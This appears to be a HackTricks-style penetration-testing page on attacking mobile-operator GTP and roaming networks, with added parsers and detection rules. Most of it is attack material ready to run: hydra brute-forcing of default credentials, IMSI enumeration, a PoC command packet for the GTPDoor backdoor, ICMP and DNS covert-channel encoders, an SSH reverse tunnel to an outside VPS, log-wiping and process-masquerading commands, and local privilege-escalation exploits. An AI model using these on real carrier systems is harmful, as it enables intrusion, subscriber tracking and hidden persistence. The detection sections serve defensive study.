Telecom Network Exploitation (GTP / Roaming Environments)


tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

note

Core mobile signalling protocols (GPRS Tunnelling Protocol, GTP) usually traverse the semi-trusted GRX/IPX roaming backbones. Because they ride on plain UDP with essentially no authentication, any foothold inside a telecom perimeter can typically reach the core signalling plane directly. The following notes collect attack techniques observed in the wild against SGSN/GGSN, PGW/SGW and other EPC nodes.

1. Recon & Initial Access

1.1 Default OSS / NE Accounts

A surprisingly large set of vendor network elements ship with hard-coded SSH/Telnet users such as root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, … A dedicated wordlist of vendor defaults dramatically raises brute-force success:

```bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
```

If the device only exposes a management VRF, pivot through a jump host first (see the «SGSN Emu Tunnel» section below).

1.2 Host Discovery inside GRX/IPX

Most GRX operators still allow ICMP echo across the backbone. Combine masscan with its UDP probe on the GTP-C port to quickly map GTP-C listeners:

```bash
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
```

2. Enumerating Subscribers – cordscan

This Go tool crafts GTP-C Create PDP Context Request packets and logs the responses. Each response reveals the SGSN / MME currently serving the queried IMSI and, sometimes, the subscriber's visited PLMN.

```bash
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
```

Key flags:

  • --imsi Target subscriber IMSI
  • --oper Home network / HNI (MCC+MNC)
  • -w Write raw packets to a pcap

Key constants inside the binary can be patched to extend the scan:

```go
pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"
```

3. Code Execution over GTP – GTPDoor

GTPDoor is a small ELF service that binds UDP 2123 and parses every incoming GTP-C packet. When the payload starts with a pre-shared tag, the remainder is decrypted (AES-128-CBC) and executed via /bin/sh -c. Stdout/stderr are smuggled back inside Echo Response messages, so no outbound session is ever created.

Minimal PoC packet (Python):

```python
# gtpc is the helper module shipped with the PoC (not a PyPI package);
# AES comes from pycryptodome (pip install pycryptodome)
import gtpc
from Crypto.Cipher import AES

key = b"SixteenByteKey!!"   # AES-128 needs exactly 16 bytes
cmd = b"id;uname -a"
# zero-pad the command to a multiple of the 16-byte block size; the implant
# uses a fixed all-zero IV, so identical commands produce identical blobs
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00" * 16).encrypt(cmd.ljust(32, b"\x00"))
# Echo Request whose payload is the pre-shared tag followed by the ciphertext
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
```

Detection:

  • any host sending unbalanced Echo Requests (far more requests than responses) to SGSN IPs
  • GTP version field set to 1 while message type = 1 (Echo) carrying extra payload: a deviation from the spec, since a conformant Echo Request has no IEs
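To make the two indicators above concrete, here is an added example (my code, not the GTPDoor implant nor the page's gtpc helper) of a minimal GTPv1-C framer in the style of 3GPP TS 29.060: it builds a clean Echo Request/Response pair, builds a GTPDoor-style Echo Request that smuggles the tagged blob in a Private Extension IE, and parses packets back to flag that anomaly. The pre-shared tag MAG1C is taken from the PoC; the placeholder blob, the extension identifier 0 and the IE layout chosen for the implant are assumptions.

```python
"""Minimal GTPv1-C framing plus a detector for Echo Requests that carry IEs."""
import struct

GTP_ECHO_REQ, GTP_ECHO_RSP, GTP_CREATE_PDP_REQ = 1, 2, 16
IE_RECOVERY, IE_PRIVATE_EXT = 14, 255          # Recovery is TV (1 byte), Private Extension is TLV
GTPDOOR_TAG = b"MAG1C"                          # pre-shared tag from the PoC above (assumed)


def gtp_header(msg_type, payload, teid=0, seq=0):
    """GTPv1 header: version=1, PT=1 (GTP), S=1 (sequence number present)."""
    flags = (1 << 5) | (1 << 4) | (1 << 1)
    # length counts everything after the 8 mandatory octets: seq(2)+N-PDU(1)+next-ext(1)+payload
    return struct.pack("!BBHIHBB", flags, msg_type, 4 + len(payload), teid, seq, 0, 0) + payload


def private_extension_ie(ext_id, value):
    return struct.pack("!BHH", IE_PRIVATE_EXT, 2 + len(value), ext_id) + value


def echo_request(seq, blob=b""):
    """Spec-conformant Echo Request has no IEs; GTPDoor appends a Private Extension IE."""
    payload = private_extension_ie(0, GTPDOOR_TAG + blob) if blob else b""
    return gtp_header(GTP_ECHO_REQ, payload, seq=seq)


def echo_response(seq, restart_counter=1):
    """Echo Response carries a single mandatory Recovery IE."""
    return gtp_header(GTP_ECHO_RSP, struct.pack("!BB", IE_RECOVERY, restart_counter), seq=seq)


def parse_gtp(pkt):
    flags, msg_type, length, teid = struct.unpack("!BBHI", pkt[:8])
    version, off, seq = flags >> 5, 8, None
    if flags & 0x07:                        # any of E/S/PN set => 4 optional octets present
        seq = struct.unpack("!H", pkt[8:10])[0]
        off = 12
    body, ies, i = pkt[off:8 + length], [], 0
    while i < len(body):
        t = body[i]
        if t >= 128:                        # TLV-encoded IE: type(1) length(2) value
            ln = struct.unpack("!H", body[i + 1:i + 3])[0]
            ies.append((t, body[i + 3:i + 3 + ln]))
            i += 3 + ln
        elif t == IE_RECOVERY:              # TV-encoded IE with a fixed 1-byte value
            ies.append((t, body[i + 1:i + 2]))
            i += 2
        else:
            raise ValueError(f"unhandled TV IE type {t}")
    return {"version": version, "type": msg_type, "teid": teid, "seq": seq, "ies": ies}


def gtpdoor_indicators(pkt):
    """Return the list of anomaly names found in one GTP-C packet (empty = clean)."""
    p = parse_gtp(pkt)
    hits = []
    if p["type"] == GTP_ECHO_REQ and p["ies"]:
        hits.append("echo_request_with_ies")
    for t, v in p["ies"]:
        # Private Extension value = extension id (2 bytes) + vendor data
        if t == IE_PRIVATE_EXT and v[2:].startswith(GTPDOOR_TAG):
            hits.append("gtpdoor_tag")
    return hits


if __name__ == "__main__":
    blob = b"\x00" * 32                     # stands in for the AES-128-CBC ciphertext (constructed)
    for name, pkt in [("clean", echo_request(8)), ("rsp", echo_response(8)),
                      ("gtpdoor", echo_request(7, blob=blob))]:
        print(name, parse_gtp(pkt)["type"], gtpdoor_indicators(pkt))
```

The parser only knows the IEs this example emits (Recovery and any TLV type); a production decoder needs the full TV length table from TS 29.060, but the detection rule itself stays the same: an Echo Request is never supposed to carry information elements.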

4. Pivoting Through the Core

4.1 sgsnemu + SOCKS5

OsmoGGSN ships an SGSN emulator (sgsnemu) capable of establishing a PDP context towards a real GGSN/PGW. Once the context is negotiated, Linux gets a new tun0 interface that is reachable from the roaming peer.

```bash
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &   # internal SOCKS proxy
```

With proper firewall hair-pinning this tunnel bypasses the signalling-only VLANs and lands you directly on the data plane.

4.2 SSH Reverse Tunnel over Port 53

DNS is almost always allowed out of roaming infrastructures. Expose the internal SSH service to your VPS, listening there on :53, and come back later from home:

```bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
```

Check that GatewayPorts yes is enabled on the VPS.

5. Covert Channels

| Channel | Transport | Decoding | Notes |
|---|---|---|---|
| ICMP – EchoBackdoor | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | purely passive listener, no outbound traffic |
| DNS – NoDepDNS | UDP 53 | XOR (key = funnyAndHappy) encoded in A-record octets | watches the *.nodep sub-domain |
| GTP – GTPDoor | UDP 2123 | AES-128-CBC blob in Private Extension IE | blends in with legitimate GTP-C chatter |

All implants implement watchdogs that timestomp their binaries and re-spawn if crashed.
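The table only names the encodings; the following added example (my code, not the implants' source) spells out what the ICMP and DNS channels look like on the wire. The framing is my reading of the table and is an assumption: each ICMP echo payload is the 4-byte key followed by a 14-byte chunk XORed with that key, and NoDepDNS XORs the data with the fixed key funnyAndHappy and packs it four bytes per A-record. Sample commands and keys are constructed.

```python
"""Encoder/decoder pairs for the ICMP EchoBackdoor and DNS NoDepDNS channels."""
import struct

ICMP_CHUNK = 14
NODEP_KEY = b"funnyAndHappy"   # key named in the table


def xor(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# --- ICMP: payload = key(4) || XOR(chunk padded to 14 bytes, key) ---------------------
def icmp_encode(cmd, key):
    """Split a command into 18-byte echo payloads (assumed framing)."""
    assert len(key) == 4, "EchoBackdoor key is 4 bytes"
    payloads = []
    for i in range(0, len(cmd), ICMP_CHUNK):
        chunk = cmd[i:i + ICMP_CHUNK].ljust(ICMP_CHUNK, b"\x00")
        payloads.append(key + xor(chunk, key))
    return payloads


def icmp_decode(payloads):
    """Recover the command: the key travels in clear in the first 4 bytes of each payload."""
    out = b"".join(xor(p[4:4 + ICMP_CHUNK], p[:4]) for p in payloads)
    return out.rstrip(b"\x00")


def icmp_checksum(data):
    """RFC 792 one's-complement checksum over the ICMP header + payload."""
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


def icmp_echo_packet(icmp_type, ident, seq, payload):
    """ICMP echo (type 8) or echo-reply (type 0) with a valid checksum, ready for a raw socket."""
    hdr = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    return struct.pack("!BBHHH", icmp_type, 0, icmp_checksum(hdr + payload), ident, seq) + payload


# --- DNS: XOR with the fixed key, then 4 bytes per A record (dotted quad) --------------
def dns_encode(data):
    padded = data.ljust((len(data) + 3) // 4 * 4, b"\x00")   # pad plaintext, then XOR
    enc = xor(padded, NODEP_KEY)
    return [".".join(str(b) for b in enc[i:i + 4]) for i in range(0, len(enc), 4)]


def dns_decode(a_records):
    raw = b"".join(bytes(int(o) for o in rec.split(".")) for rec in a_records)
    return xor(raw, NODEP_KEY).rstrip(b"\x00")


if __name__ == "__main__":
    cmd = b"id;uname -a"                                  # constructed sample command
    pkts = [icmp_echo_packet(0, 0xBEEF, i, p) for i, p in enumerate(icmp_encode(cmd, b"K3y!"))]
    print(len(pkts), "echo-reply packets,", len(pkts[0]), "bytes each")
    print(icmp_decode([p[8:] for p in pkts]))
    print(dns_encode(cmd), dns_decode(dns_encode(cmd)))
```

Note what the decoder needs: for ICMP, nothing but the packet itself, which is why the table calls it purely passive; for DNS, only the fixed key, so a responder that returns four-octet A records is all the "server" side has to be. Both facts are what make detection idea 4 below (large, non-zero id/seq fields in echo-reply bursts) and the DNS volume check practical.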

6. Defense Evasion Cheatsheet

```bash
# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null

# Masquerade as kernel thread (cosmetic: only the 16-byte comm shown by ps/top changes;
# /proc/$$/cmdline and the parent process chain still give the shell away)
echo 0 > /proc/$$/autogroup          # resets the autogroup nice value; on its own this hides nothing
printf 'kworker/1' > /proc/$$/comm   # comm now reads kworker/1 in ps/top

touch -r /usr/bin/time /usr/bin/chargen   # timestomp: copy mtime/atime from a legit binary
setenforce 0                              # disable SELinux (permissive mode, logged in audit)
```

7. Privilege Escalation on Legacy NEs

```bash
# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd

# PwnKit – CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py
```

Cleanup:

```bash
userdel firefart 2>/dev/null   # DirtyCow's injected /etc/passwd user
rm -f /tmp/sh ; history -c
```

8. Tool Box

  • cordscan, GTPDoor, EchoBackdoor, NoDepDNS – the custom tools described in the previous sections.
  • FScan : intranet TCP scanning (fscan -p 22,80,443 10.0.0.0/24)
  • Responder : LLMNR/NBT-NS poisoning, rogue WPAD
  • Microsocks + ProxyChains : lightweight SOCKS5 pivoting
  • FRP (≥0.37) : NAT traversal / asset bridging

Detection Ideas

  1. Any device other than an SGSN/GGSN originating Create PDP Context Requests.
  2. Non-standard ports (53, 80, 443) receiving SSH handshakes from internal IPs.
  3. Frequent Echo Requests without matching Echo Responses – may indicate GTPDoor beacons.
  4. High rate of ICMP echo-reply traffic with large, non-zero identifier/sequence fields.
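The four ideas above can be turned into rules over flow or packet records from a GTP-C probe, a NetFlow/Zeek export or a pcap. The following added example (my code, not part of the page) does that over a constructed sample set: the record layout, the inventory of legitimate GTP-C originators, the 10.0.0.0/8 internal range, the unanswered-echo threshold of 3 and the id/seq floor of 0x1000 are all assumptions to tune per network.

```python
"""Rule-based triage of the four detection ideas over constructed records."""

GTP_ECHO_REQ, GTP_ECHO_RSP, GTP_CREATE_PDP_REQ = 1, 2, 16
KNOWN_GTPC_ORIGINATORS = {"10.1.1.10", "10.1.1.11"}   # assumed SGSN inventory
INTERNAL_PREFIX = "10."                                # assumed internal range
SUSPECT_SSH_PORTS = {53, 80, 443}

# Constructed sample records; "msg" is the GTP message type, "seq" the GTP sequence number
RECORDS = [
    {"ts": 1, "src": "10.1.1.10", "dst": "10.1.1.100", "proto": "gtpc", "dport": 2123, "msg": 16, "seq": 100},
    {"ts": 2, "src": "10.9.9.9", "dst": "10.1.1.100", "proto": "gtpc", "dport": 2123, "msg": 16, "seq": 5},
    {"ts": 3, "src": "10.9.9.9", "dst": "10.1.1.10", "proto": "gtpc", "dport": 2123, "msg": 1, "seq": 1},
    {"ts": 4, "src": "10.9.9.9", "dst": "10.1.1.10", "proto": "gtpc", "dport": 2123, "msg": 1, "seq": 2},
    {"ts": 5, "src": "10.9.9.9", "dst": "10.1.1.10", "proto": "gtpc", "dport": 2123, "msg": 1, "seq": 3},
    {"ts": 6, "src": "10.1.1.11", "dst": "10.1.1.100", "proto": "gtpc", "dport": 2123, "msg": 1, "seq": 40},
    {"ts": 7, "src": "10.1.1.100", "dst": "10.1.1.11", "proto": "gtpc", "dport": 2123, "msg": 2, "seq": 40},
    {"ts": 8, "src": "10.9.9.9", "dst": "203.0.113.66", "proto": "tcp", "dport": 53, "banner": "SSH-2.0-OpenSSH_8.9"},
    {"ts": 9, "src": "10.9.9.9", "dst": "203.0.113.66", "proto": "tcp", "dport": 443, "banner": "SSH-2.0-OpenSSH_8.9"},
    {"ts": 10, "src": "10.2.2.2", "dst": "10.3.3.3", "proto": "icmp", "icmp_type": 0, "id": 0xBEEF, "seq": 0x7A21},
    {"ts": 11, "src": "10.2.2.2", "dst": "10.3.3.3", "proto": "icmp", "icmp_type": 0, "id": 0xBEEF, "seq": 0x7A22},
    {"ts": 12, "src": "10.2.2.2", "dst": "10.3.3.3", "proto": "icmp", "icmp_type": 0, "id": 0xBEEF, "seq": 0x7A23},
    {"ts": 13, "src": "10.4.4.4", "dst": "10.3.3.3", "proto": "icmp", "icmp_type": 0, "id": 1, "seq": 1},
]


def rogue_pdp_creators(records, known=KNOWN_GTPC_ORIGINATORS):
    """Idea 1: Create PDP Context Requests from anything that is not a known SGSN."""
    return sorted({r["src"] for r in records
                   if r["proto"] == "gtpc" and r["msg"] == GTP_CREATE_PDP_REQ and r["src"] not in known})


def ssh_on_odd_ports(records):
    """Idea 2: SSH banner seen on 53/80/443 with an internal source (reverse tunnel / port 53 trick)."""
    return sorted({(r["src"], r["dport"]) for r in records
                   if r["proto"] == "tcp" and r.get("dport") in SUSPECT_SSH_PORTS
                   and r.get("banner", "").startswith("SSH-") and r["src"].startswith(INTERNAL_PREFIX)})


def unanswered_echo_sources(records, min_unanswered=3):
    """Idea 3: sources whose Echo Requests (src,dst,seq) never get an Echo Response (dst,src,seq)."""
    answered = {(r["dst"], r["src"], r["seq"]) for r in records
                if r["proto"] == "gtpc" and r["msg"] == GTP_ECHO_RSP}
    counts = {}
    for r in records:
        if r["proto"] == "gtpc" and r["msg"] == GTP_ECHO_REQ and (r["src"], r["dst"], r["seq"]) not in answered:
            counts[r["src"]] = counts.get(r["src"], 0) + 1
    return sorted(s for s, c in counts.items() if c >= min_unanswered)


def noisy_icmp_replies(records, min_count=3, floor=0x1000):
    """Idea 4: bursts of echo-replies (type 0) whose id and seq are both large and non-zero."""
    counts = {}
    for r in records:
        if r["proto"] == "icmp" and r["icmp_type"] == 0 and r["id"] >= floor and r["seq"] >= floor:
            counts[r["src"]] = counts.get(r["src"], 0) + 1
    return sorted(s for s, c in counts.items() if c >= min_count)


def run_all(records):
    return {"rogue_pdp": rogue_pdp_creators(records), "ssh_odd_ports": ssh_on_odd_ports(records),
            "echo_beacons": unanswered_echo_sources(records), "icmp_bursts": noisy_icmp_replies(records)}


if __name__ == "__main__":
    for rule, hits in run_all(RECORDS).items():
        print(f"{rule:14s} {hits}")
```

Idea 3 deserves a caveat: a legitimate peer that is simply down also produces unanswered Echo Requests, so the rule should be scoped to sources that are not in the SGSN/GGSN inventory or combined with rule 1 before it pages anyone.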
